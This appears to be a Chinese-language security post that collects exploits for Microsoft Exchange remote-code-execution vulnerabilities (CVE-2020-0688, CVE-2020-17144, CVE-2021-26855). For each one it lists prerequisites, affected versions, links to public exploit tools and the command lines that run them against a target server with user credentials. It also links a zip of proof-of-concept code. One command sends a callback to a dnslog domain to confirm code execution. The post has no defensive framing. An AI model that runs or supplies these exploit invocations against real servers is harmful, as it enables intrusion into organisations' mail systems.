# CVE-2020-0688 Exchange RCE
前提:
已知一个域用户
影响版本:
-Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30
-Microsoft Exchange Server 2013 Cumulative Update 23
-Microsoft Exchange Server 2016 Cumulative Update 15
-Microsoft Exchange Server 2019 Cumulative Update 4
exp1:
[@Ridter](https://github.com/Ridter/cve-2020-0688)
“`
python cve-2020-0688.py -s https://ip/owa/ -u user -p pass -c “ping test.ph4nxq.dnslog.cn”
“`
exp2:
[@zcgonvh](https://github.com/zcgonvh/CVE-2020-0688)
“`
ExchangeCmd ip user password
“`
# CVE-2020-17144 Exchange RCE
前提:
普通用户
影响版本:
-Microsoft Exchange Server 2010
exp1:
[@Airboi](https://github.com/Airboi/CVE-2020-17144-EXP)
“`
CVE-2020-17144-EXP.exe mail.example.com user pass
“`
# CVE-2021-26855 Exchange RCE
影响版本:
– Microsoft Exchange Server 2010
– Microsoft Exchange Server 2013
– Microsoft Exchange Server 2016
– Microsoft Exchange Server 2019
exp:
[@o2oxy](https://www.o2oxy.cn/3169.html)
“`
python exp.py 192.168.217.152 administrator@ex.com
“`
![exp.png](/media/editor/exp_20210720210505017319.png)
## POC
[点我下载 Exchange部分漏洞POC.zip](/Gr33kLibrary/download_tool/105/)
请登录后查看评论内容